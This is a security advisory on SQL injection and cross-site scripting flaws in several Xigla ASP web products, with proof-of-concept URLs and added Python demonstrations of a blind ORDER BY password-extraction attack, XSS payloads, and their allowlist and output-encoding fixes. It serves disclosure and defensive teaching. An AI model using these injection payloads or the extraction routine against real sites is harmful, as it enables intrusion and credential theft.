Xigla Multiple Products - Multiple Vulnerabilities

########################## www.BugReport.ir #######################################
#
#      AmnPardaz Security Research Team
#
# Title: Xigla Multiple Products - Multiple Vulnerabilities
# Vendor: http://www.xigla.com/
# Exploit: N/A
# Impact: Medium
# Fix: N/A
# Original Advisory: http://bugreport.ir/index.php?/41
###################################################################################


####################
1. Description:
####################

	Xigla offers several web-based products (from content management systems to live help solutions) for enhancing websites.
		1.1. Absolute Live Support XE:   Absolute Live Support is live customer support software for your web site that lets visitors communicate instantly with your customer service personnel.
		1.2. Absolute News Manager XE:   Absolute News Manager is a web site news and article content management system.
		1.3. Absolute Banner Manager XE: Absolute Banner Manager is a web-based banner management and ad tracking application.
		1.4. Absolute Form Processor XE: Absolute Form Processor processes web-based HTML forms. You don't have to develop server code, validation rules, form mailers or auto-responders for your web forms; this application does all of this for you.
		1.5. Absolute Image Gallery XE:  A media gallery application for creating and maintaining image and multimedia galleries. The code resides on your web server and searches your web site for new images and files to add to your gallery.
		1.6. Absolute Poll Manager XE:   Absolute Poll Manager is a survey application for dynamically adding polls and surveys to your site, creating interest among your visitors and gathering information about what they think.
		1.7. Absolute Control Panel XE:  Absolute Control Panel is a web-based interface designed to provide centralized access to your web-based applications and Xigla application modules. It serves as a single access point to Xigla's suite of web-based solutions on your web sites.


####################
2. Vulnerabilities:
####################
    2.1. Absolute Live Support XE (ASP version 5.1) (admin)
		2.1.1. SQL Injection in "search.asp" via the "orderby" parameter.
			POC:
http://[URL]/xlaabsolutels/search.asp?orderby=[SQL INJECTION]

		2.1.2. XSS in "search.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsolutels/admin/search.asp

    2.2. Absolute News Manager XE (ASP version 3.2) (admin)
		2.2.1. SQL Injection in "search.asp" via the "orderby" parameter.
			POC:
http://[URL]/xlaabsolutenm/search.asp?orderby=[SQL INJECTION]

		2.2.2. XSS in "anmviewer.asp", "search.asp", "editarticleX.asp", "publishers.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsolutenm/admin/anmviewer.asp
http://[URL]/xlaabsolutenm/admin/search.asp
http://[URL]/xlaabsolutenm/admin/editarticleX.asp
http://[URL]/xlaabsolutenm/admin/publishers.asp

    2.3. Absolute Banner Manager XE (ASP version) (admin)
		2.3.1. SQL Injection in "searchbanners.asp" via the "orderby" parameter.
			POC:
http://[URL]/xlaabsolutebm/searchbanners.asp?orderby=[SQL INJECTION]

		2.3.2. XSS in "searchbanners.asp", "listadvertisers.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsolutebm/admin/searchbanners.asp
http://[URL]/xlaabsolutebm/admin/listadvertisers.asp

    2.4. Absolute Form Processor XE (ASP version 4.0) (admin)
		2.4.1. SQL Injection in "search.asp" via the "orderby" parameter.
			POC:
http://[URL]/absolutefp/search.asp?orderby=[SQL INJECTION]

		2.4.2. XSS in "search.asp", "users.asp" (all fields are vulnerable).
			POC:
http://[URL]/absolutefp/admin/search.asp
http://[URL]/absolutefp/admin/users.asp

    2.5. Absolute Image Gallery XE
		2.5.1. SQL Injection in "gallery.asp" via the "categoryid" parameter.
			POC:
http://[URL]/xlaabsoluteig/gallery.asp?action=viewimage&categoryid=[SQL INJECTION]

		2.5.2. XSS in "gallery.asp", "search.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsoluteig/admin/search.asp

    2.6. Absolute Poll Manager XE (admin)
		2.6.1. SQL Injection in "search.asp" via the "orderby" parameter.
			POC:
http://[URL]/xlaabsolutepm/search.asp?orderby=[SQL INJECTION]

		2.6.2. XSS in "search.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsolutepm/admin/search.asp

    2.7. Absolute Control Panel XE
		2.7.1. XSS in "admin/users.asp" (all fields are vulnerable).
			POC:
http://[URL]/xlaabsolutecp/users.asp

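The following is an added example, not code from the advisory or from Xigla's products. It mirrors in Python, against an in-memory SQLite database, the classic-ASP pattern behind the "orderby" findings above (the request value concatenated into ORDER BY), shows why such a sink is exploitable even when the page never displays a database error (a CASE expression in the sort key turns row order into a yes/no oracle), and shows the allowlist fix. The articles/users tables, their columns and the stored password are constructed for the demonstration; the real product schemas are not known.

```python
import sqlite3


def make_db():
    """Constructed stand-in for a Xigla product database (assumption: the
    real schemas are not known; this exists only for the demo)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT);
        INSERT INTO articles VALUES (1, 'Alpha'), (2, 'Bravo'), (3, 'Charlie');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return con


def search_vulnerable(con, orderby):
    """The injectable pattern: the request parameter is concatenated straight
    into the ORDER BY clause, as a page doing "... ORDER BY " & Request("orderby")
    would. Returns the article ids in the order the database produced them."""
    sql = "SELECT id, title FROM articles ORDER BY " + orderby
    return [row[0] for row in con.execute(sql)]


# The fix: only these request values are accepted, each mapped to a real column.
ALLOWED_ORDER = {"id": "id", "title": "title"}


def search_safe(con, orderby, direction="asc"):
    """Identifiers cannot be bound as query parameters, so the request value is
    looked up in a fixed allowlist and anything else is rejected outright."""
    column = ALLOWED_ORDER.get(orderby.strip().lower())
    if column is None or direction.lower() not in ("asc", "desc"):
        raise ValueError("orderby/direction not in allowlist")
    sql = "SELECT id, title FROM articles ORDER BY %s %s" % (column, direction.upper())
    return [row[0] for row in con.execute(sql)]


def is_rejected(con, orderby):
    """True if the hardened search refuses the given orderby value."""
    try:
        search_safe(con, orderby)
    except ValueError:
        return True
    return False


def guess_is_right(con, position, guess):
    """One boolean-blind probe through the vulnerable ORDER BY: the sort key is
    id when the guessed character is correct and -id otherwise, so the row
    order answers one yes/no question per request, with no error message."""
    payload = (
        "(CASE WHEN (SELECT substr(password,%d,1) FROM users WHERE id=1)='%s' "
        "THEN id ELSE -id END)" % (position, guess)
    )
    return search_vulnerable(con, payload) == [1, 2, 3]


def recover_password(con, alphabet="abcdefghijklmnopqrstuvwxyz0123456789", max_len=16):
    """Recovers the stored admin password one character at a time."""
    recovered = ""
    for position in range(1, max_len + 1):
        for ch in alphabet:
            if guess_is_right(con, position, ch):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal order:", search_vulnerable(db, "id"))
    print("recovered via ORDER BY injection:", recover_password(db))
    print("hardened:", search_safe(db, "title"),
          "rejects payload:", is_rejected(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

The point of the CASE payload is that the attacker needs neither a UNION nor an error message: the page still renders normally, only the sort order changes, which is why "the page shows no SQL errors" is not evidence that an ORDER BY sink is safe.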
####################
3. Solution:
####################
	No vendor fix was available at the time of this advisory. Edit the source code so that every request parameter is validated before use: an ORDER BY column name cannot be passed as a bound query parameter, so accept "orderby" only from a fixed allowlist of column names and reject anything else; validate "categoryid" as an integer; pass all other user-supplied values to the database through parameterised queries rather than string concatenation; and HTML-encode every value echoed back into a page (Server.HTMLEncode in classic ASP), including values placed inside tag attributes.
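Added example, not from the advisory or from Xigla's code, of the output-encoding fix for the XSS findings: a search page that echoes the submitted fields into both an attribute value and the page body, rendered first without encoding and then with html.escape(quote=True), and checked with an HTML parser rather than a string match (a string match would wrongly flag the encoded page, because the text "onfocus=" still appears in it, harmlessly, inside a quoted attribute). The field names, page template and payloads are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Assumed field names; the real search.asp pages are not reproduced here.
FIELDS = ("keyword", "author")


def render_search_vulnerable(params):
    """Echoes each submitted field back unencoded, once into an attribute
    value and once into the page body, as the vulnerable pages do."""
    inputs = "".join(
        '<input name="%s" value="%s">' % (name, params.get(name, "")) for name in FIELDS
    )
    return "<form>%s</form><p>Results for %s</p>" % (inputs, params.get("keyword", ""))


def render_search_safe(params):
    """Same page with every echoed value HTML-encoded at the point of output.
    quote=True matters: inside value="..." a bare " ends the attribute, so the
    quote characters must be encoded as well as < > &."""
    def enc(name):
        return html.escape(params.get(name, ""), quote=True)

    inputs = "".join('<input name="%s" value="%s">' % (name, enc(name)) for name in FIELDS)
    return "<form>%s</form><p>Results for %s</p>" % (inputs, enc("keyword"))


class ActiveContentFinder(HTMLParser):
    """Parses the rendered page the way a browser would and records anything
    that can run script: <script> elements and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.findings.append("script")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(name.lower())


def active_content(page):
    """Returns the script-capable elements/attributes found in the page."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


# Constructed payloads: one breaks out of the attribute to inject an element,
# the other stays inside the tag and adds an event handler, which a filter that
# only strips "<script" would miss.
PAYLOADS = {
    "keyword": '"><script>alert(1)</script>',
    "author": '" onfocus="alert(1)',
}

if __name__ == "__main__":
    print("vulnerable:", active_content(render_search_vulnerable(PAYLOADS)))
    print("encoded:   ", active_content(render_search_safe(PAYLOADS)))
```

Encoding belongs at the output sink, not at the input: the same search term must stay raw for the database query (where the defence is parameterisation) and be encoded only when written into HTML.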
####################
4. Credit :
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
